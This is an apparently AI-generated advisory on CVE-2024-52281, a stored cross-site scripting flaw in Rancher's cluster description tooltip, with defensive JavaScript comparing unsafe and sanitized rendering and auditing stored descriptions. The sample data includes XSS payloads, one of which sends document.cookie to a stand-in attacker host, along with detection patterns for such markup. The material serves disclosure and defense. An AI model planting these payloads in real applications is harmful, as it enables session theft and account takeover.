CVE-2024-52281
Linux openSUSE vulnerability analysis and mitigation

Overview

CVE-2024-52281 is a stored cross-site scripting (XSS) flaw in the Rancher UI. Rancher is an open-source container management platform widely used to run and administer Kubernetes clusters. The flaw was reported by Bhavin Makwana of Workday's Cyber Defence Team and carries a CVSS v3.1 base score of 8.9 (High). It affects Rancher versions from 2.9.0 up to, but not including, 2.9.4 (GitHub Advisory, Security Online).

Technical details

The flaw is a stored XSS in the cluster description field of the Rancher UI. The UI rendered the stored description through the v-tooltip directive, which inserted the text into the page as HTML without sanitizing it. An attacker who could save HTML into a cluster description therefore had that HTML, including script and event-handler attributes, executed in the browser of any user who later viewed that cluster's description in the UI. The fix replaces v-tooltip with v-clean-tooltip, which sanitizes the HTML before it is rendered. The CVSS v3.1 base score is 8.9, vector CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L: network attack vector; low attack complexity; low privileges required (an account allowed to set a cluster description); user interaction required (a victim must view the page that renders the description); changed scope, because the script runs in the victim's session rather than the attacker's; high confidentiality and integrity impact; low availability impact (GitHub Advisory, Wiz).
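The two rendering patterns side by side, as an added illustration for this page rather than Rancher's own code: an unsafe tooltip renderer that injects the stored description as raw HTML (the v-tooltip behaviour described above) next to one that sanitizes first (the v-clean-tooltip idea). The small allow-list sanitizer and the `containsLiveScript` heuristic are stand-ins written for this example; the project's real directive uses a full HTML sanitizer library, and the sample descriptions are constructed.

```javascript
// Added illustration for this page, not Rancher's own code. It contrasts a
// tooltip renderer that injects the stored description as raw HTML (the
// v-tooltip pattern) with one that sanitizes first (the v-clean-tooltip idea).
// The allow-list sanitizer below is a stand-in written for this example; the
// real directive uses a full HTML sanitizer library.

// Escape the five characters that let text be parsed as markup.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable pattern: user-controlled text goes straight into markup that the
// browser will parse as HTML, so tags and event handlers in it are live.
function renderTooltipUnsafe(description) {
  return `<div class="tooltip">${description}</div>`;
}

// Hardened pattern: escape everything, then re-enable only bare inline
// formatting tags from a short allow-list. A tag carrying any attribute
// (onerror, onmouseover, href, src) never matches and stays escaped text.
const ALLOWED_TAGS = new Set(["b", "i", "em", "strong", "br"]);

function sanitizeDescription(description) {
  const escaped = escapeHtml(description);
  return escaped.replace(/&lt;(\/?)([a-z]+)&gt;/gi, (whole, slash, tag) =>
    ALLOWED_TAGS.has(tag.toLowerCase()) ? `<${slash}${tag.toLowerCase()}>` : whole
  );
}

function renderTooltipSafe(description) {
  return `<div class="tooltip">${sanitizeDescription(description)}</div>`;
}

// Heuristic: does the rendered markup still contain a real (unescaped) tag
// that would execute script? Escaped tags begin with "&lt;" and never match.
function containsLiveScript(html) {
  return /<script\b|<[a-z]+[^>]*\son[a-z]+\s*=|<[a-z]+[^>]*\b(?:href|src)\s*=\s*["']?javascript:/i.test(html);
}

// Constructed sample descriptions: three payloads an attacker might save
// into a cluster description, and one benign description with formatting.
const SAMPLE_DESCRIPTIONS = [
  "<img src=x onerror=\"fetch('https://attacker.example/?c=' + document.cookie)\">",
  "<script>alert(document.domain)</script>",
  "<b onmouseover=\"alert(1)\">prod</b>",
  "Production cluster <b>(eu-west)</b>",
];

// For each sample, report whether the unsafe and safe renderers leave
// executable markup in the output.
function compareRenderers(descriptions = SAMPLE_DESCRIPTIONS) {
  return descriptions.map((d) => ({
    description: d,
    unsafeExecutes: containsLiveScript(renderTooltipUnsafe(d)),
    safeExecutes: containsLiveScript(renderTooltipSafe(d)),
    safeHtml: renderTooltipSafe(d),
  }));
}

console.log(JSON.stringify(compareRenderers(), null, 2));
```

The design point is that the safe path escapes on output and only then re-admits a tiny, attribute-free set of tags; an attacker cannot smuggle a handler through a tag that is allowed, because the allow-list match requires the tag to be bare. Escaping the input before storage would not have helped an existing deployment, since descriptions saved before the fix are already in the database.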

Impact

An attacker who stores a script in a cluster description gets it executed in the browser of every user who views it. The script can read session cookies or other sensitive data exposed to the page, redirect the user to phishing sites or deliver malware, and perform actions in Rancher as the viewing user. Because the scope is changed, the script runs with whatever permissions the victim holds: a low-privileged attacker who gets an administrator to view the poisoned description can effectively act as that administrator across the Rancher-managed clusters. Even where the session cookie is HttpOnly and cannot be read by script, the script can still issue Rancher API requests from the victim's browser with the victim's session, which is enough to act on that user's behalf (Security Online).

Mitigation and workarounds

Rancher has fixed the issue in versions 2.9.4 and 2.10.0. The fix sanitizes the description HTML before it is rendered, replacing the v-tooltip directive with the safer v-clean-tooltip directive. There is no workaround; users of affected versions should upgrade immediately. Because the flaw is a stored XSS, upgrading only stops the patched UI from executing payloads; any malicious HTML already saved in a cluster description remains in the database, so it is worth reviewing existing cluster descriptions after the upgrade and cleaning out any that contain markup (GitHub Advisory, Security Online).
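A post-upgrade check a practitioner would want, written for this page as an added example and not part of Rancher's tooling: decide whether a server version falls in the affected range (2.9.0 up to but not including 2.9.4) and scan stored cluster descriptions for markup. It runs offline on constructed stand-ins for two responses. The endpoint paths (`GET /v3/settings/server-version`, `GET /v3/clusters`), the `value` and `data` fields, and the `description` field on each cluster are assumptions for this illustration; confirm them against your own Rancher instance before relying on the script.

```javascript
// Added example for this page, not Rancher's own tooling. Checks whether a
// Rancher server version is in the affected range and audits stored cluster
// descriptions for HTML. Response shapes below are ASSUMED stand-ins for
// GET /v3/settings/server-version and GET /v3/clusters.

// "v2.9.3", "2.9.3" or "v2.9.3-rc1" -> [2, 9, 3]; anything else -> null.
// Pre-release suffixes are dropped, so treat "v2.9.4-rc1" as affected by hand.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  return m ? m.slice(1, 4).map(Number) : null;
}

function cmpVersion(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// Affected range from the advisory: >= 2.9.0 and < 2.9.4 (2.10.0 is patched).
// Returns null for an unparseable version rather than guessing.
function isAffected(version) {
  const v = parseVersion(version);
  if (!v) return null;
  return cmpVersion(v, [2, 9, 0]) >= 0 && cmpVersion(v, [2, 9, 4]) < 0;
}

// Heuristic for markup in a description: any tag, a javascript: URL, or an
// on*= handler. Tuned for recall; review hits by hand rather than auto-deleting.
const MARKUP_RE = /<\s*\/?\s*[a-z!][^>]*>|javascript:|\son[a-z]+\s*=/i;

function auditClusters(clusters) {
  return clusters
    .filter((c) => MARKUP_RE.test(c.description || ""))
    .map((c) => ({ id: c.id, name: c.name, description: c.description }));
}

// Constructed sample data standing in for the two API responses.
const SAMPLE_SERVER_VERSION = { value: "v2.9.3" };
const SAMPLE_CLUSTERS = {
  data: [
    { id: "c-m-abc123", name: "prod-eu", description: "Production, EU region" },
    { id: "c-m-def456", name: "staging", description: "<img src=x onerror=\"alert(document.cookie)\">" },
    { id: "local", name: "local", description: "" },
  ],
};

// Combine the version verdict and the description audit into one report.
function report(serverVersion, clustersResponse) {
  return {
    serverVersion: serverVersion.value,
    affected: isAffected(serverVersion.value),
    suspicious: auditClusters(clustersResponse.data),
  };
}

console.log(JSON.stringify(report(SAMPLE_SERVER_VERSION, SAMPLE_CLUSTERS), null, 2));
```

To run it against a live server, fetch the two responses with an API token (assumed form: `curl -s -H "Authorization: Bearer $TOKEN" "$RANCHER_URL/v3/settings/server-version"` and the same for `/v3/clusters`) and pass the parsed JSON to `report`. A hit in `suspicious` on a patched server is no longer executable in the UI, but it is still attacker-controlled content in your database and an indicator that someone with description-edit rights tried the attack.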

Community reactions

The security community has actively discussed this vulnerability on social media platforms, with security researchers and organizations emphasizing the importance of immediate patching. Notable reactions include warnings about the potential impact on Kubernetes deployments and the urgency of applying security updates (SOCRadar).


Source: This report was generated using AI.

Related Linux openSUSE vulnerabilities:

CVE ID           Severity  Score  Technology       Component name                 CISA KEV exploit  Has fix  Published date
CVE-2025-62291   HIGH      8.1    strongSwan       strongswan-doc                 No                Yes      Jan 16, 2026
CVE-2026-0891    HIGH      8.1    Mozilla Firefox  rhel10::firefox-flatpak        No                Yes      Jan 13, 2026
CVE-2025-24528   HIGH      7.1    Kerberos         crypto-policies                No                Yes      Jan 16, 2026
CVE-2026-0890    MEDIUM    5.4    Mozilla Firefox  cpe:2.3:a:mozilla:firefox_esr  No                Yes      Jan 13, 2026
CVE-2025-43904   MEDIUM    4.2    Linux Debian     slurm_22_05-munge              No                Yes      Jan 16, 2026
